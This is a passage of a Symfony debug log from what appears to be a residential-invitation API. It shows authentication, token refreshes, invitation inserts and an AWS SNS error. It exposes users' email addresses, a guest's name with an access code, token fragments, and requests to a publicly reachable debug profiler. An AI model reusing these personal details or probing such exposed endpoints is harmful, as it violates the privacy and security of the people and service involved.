  9515. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9516. [2025-12-21 02:20:03] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9517. [2025-12-21 02:20:03] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9518. [2025-12-21 02:20:03] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9519. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9520. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  9521. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9522. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9523. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  9524. [2025-12-21 02:20:03] doctrine.DEBUG: "START TRANSACTION" [] []
  9525. [2025-12-21 02:20:03] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"41568266-d3a8-4cc4-86f1-f8 [...]","2":1,"3":"2025-12-21 02:20:03","4":"2025-12-21 02:20:03","5":"Daniela","6":"Jasso","7":"366973","8":"/invitation/f5550161b8a76f [...]","9":"3","10":null,"11":null,"12":null,"13":null,"14":null,"15":274,"16":398} []
  9526. [2025-12-21 02:20:03] doctrine.DEBUG: "COMMIT" [] []
  9527. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9528. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  9529. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.code AS code_8, t0.image_code_path AS image_code_path_9, t0.type AS type_10, t0.subtype AS subtype_11, t0.date_invitation AS date_invitation_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.event_id AS event_id_15, t0.address_id AS address_id_16, t0.user_id AS user_id_17 FROM invitation t0 WHERE t0.uuid = ? LIMIT 1 ["41568266-d3a8-4cc4-86f1-f8 [...]"] []
  9530. [2025-12-21 02:20:03] doctrine.DEBUG: "START TRANSACTION" [] []
  9531. [2025-12-21 02:20:03] doctrine.DEBUG: INSERT INTO `interval` (uuid, status, date_created, date_modified, monday, tuesday, wednesday, thursday, friday, saturday, sunday, date_start, date_end, invitation_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"2a84a20f-0604-4608-b793-f5 [...]","2":1,"3":"2025-12-21 02:20:03","4":"2025-12-21 02:20:03","5":true,"6":true,"7":true,"8":true,"9":true,"10":true,"11":true,"12":"2025-12-20 06:00:00","13":"2026-12-21 05:59:59","14":25651} []
  9532. [2025-12-21 02:20:03] doctrine.DEBUG: "COMMIT" [] []
  9533. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.code AS code_8, t0.image_code_path AS image_code_path_9, t0.type AS type_10, t0.subtype AS subtype_11, t0.date_invitation AS date_invitation_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.event_id AS event_id_15, t0.address_id AS address_id_16, t0.user_id AS user_id_17 FROM invitation t0 WHERE t0.id = ? LIMIT 1 [25651] []
  9534. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.monday AS monday_6, t0.tuesday AS tuesday_7, t0.wednesday AS wednesday_8, t0.thursday AS thursday_9, t0.friday AS friday_10, t0.saturday AS saturday_11, t0.sunday AS sunday_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.invitation_id AS invitation_id_15 FROM `interval` t0 WHERE t0.invitation_id = ? [25651] []
  9535. [2025-12-21 02:20:03] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9536. [2025-12-21 02:20:03] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  9537. [2025-12-21 02:20:03] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9538. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["7a241f11e18487675c3efcc048 [...]"] []
  9539. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9540. [2025-12-21 02:20:03] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9541. [2025-12-21 02:20:03] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9542. [2025-12-21 02:20:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9543. [2025-12-21 02:20:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9544. [2025-12-21 02:20:03] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9545. [2025-12-21 02:20:03] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9546. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["7a241f11e18487675c3efcc048 [...]"] []
  9547. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9548. [2025-12-21 02:20:03] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9549. [2025-12-21 02:20:03] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9550. [2025-12-21 02:20:03] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9551. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9552. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  9553. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9554. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  9555. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  9556. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  9557. [2025-12-21 02:20:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9558. [2025-12-21 02:20:04] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9559. [2025-12-21 02:22:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
  9560. [2025-12-21 02:22:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
  9561. [2025-12-21 02:22:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=request","method":"GET"} []
  9562. [2025-12-21 02:22:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  9563. [2025-12-21 02:22:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"37be69","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/37be69","method":"GET"} []
  9564. [2025-12-21 02:22:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9565. [2025-12-21 02:23:27] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  9566. [2025-12-21 02:23:27] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  9567. [2025-12-21 02:23:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["85d864f7f25c6b0ead6d729463 [...]"] []
  9568. [2025-12-21 02:23:27] doctrine.DEBUG: "START TRANSACTION" [] []
  9569. [2025-12-21 02:23:27] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"e28f9c3e6ae6f49f4a029e5d65 [...]","3":"2025-12-21 02:53:27","4":"","5":487,"6":"[]"} []
  9570. [2025-12-21 02:23:27] doctrine.DEBUG: "COMMIT" [] []
  9571. [2025-12-21 02:23:27] doctrine.DEBUG: "START TRANSACTION" [] []
  9572. [2025-12-21 02:23:27] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"15e9b29a11c28061e50ee09d6d [...]","3":"2026-02-19 02:23:27","4":"","5":487,"6":"[]"} []
  9573. [2025-12-21 02:23:27] doctrine.DEBUG: "COMMIT" [] []
  9574. [2025-12-21 02:23:27] doctrine.DEBUG: "START TRANSACTION" [] []
  9575. [2025-12-21 02:23:27] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"85d864f7f25c6b0ead6d729463 [...]"] []
  9576. [2025-12-21 02:23:27] doctrine.DEBUG: "COMMIT" [] []
  9577. [2025-12-21 02:23:28] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
  9578. [2025-12-21 02:23:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9579. [2025-12-21 02:23:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9580. [2025-12-21 02:23:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9581. [2025-12-21 02:23:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9582. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9583. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9584. [2025-12-21 02:23:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9585. [2025-12-21 02:23:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9586. [2025-12-21 02:23:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9587. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["4BCFC638-4B9F-4C04-8B1F-99 [...]",1,487] []
  9588. [2025-12-21 02:23:28] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClie (truncated...)  InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClientTokenId</Code>     <Message>The security token included in the request is invalid.</Message>   </Error>   <RequestId>5d68f987-8cf7-5e77-a2c5-9846d09726d3</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClientTokenId</Code>\n    <Message>The security token included in the request is invalid.</Message>\n  </Error>\n  <RequestId>5d68f987-8cf7-5e77-a2c5-9846d09726d3</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
  9589. [2025-12-21 02:23:28] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ea8ebf85-64c0-4608-897f-51db3c3b7f50","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ea8ebf85-64c0-4608-897f-51db3c3b7f50/invitation/10/0?order=desc","method":"GET"} []
  9590. [2025-12-21 02:23:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9591. [2025-12-21 02:23:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9592. [2025-12-21 02:23:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9593. [2025-12-21 02:23:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9594. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9595. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9596. [2025-12-21 02:23:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9597. [2025-12-21 02:23:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9598. [2025-12-21 02:23:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9599. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
  9600. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [487,263,1] []
  9601. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
  9602. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  9603. [2025-12-21 02:23:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9604. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [263,1] []
  9605. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [263,1] []
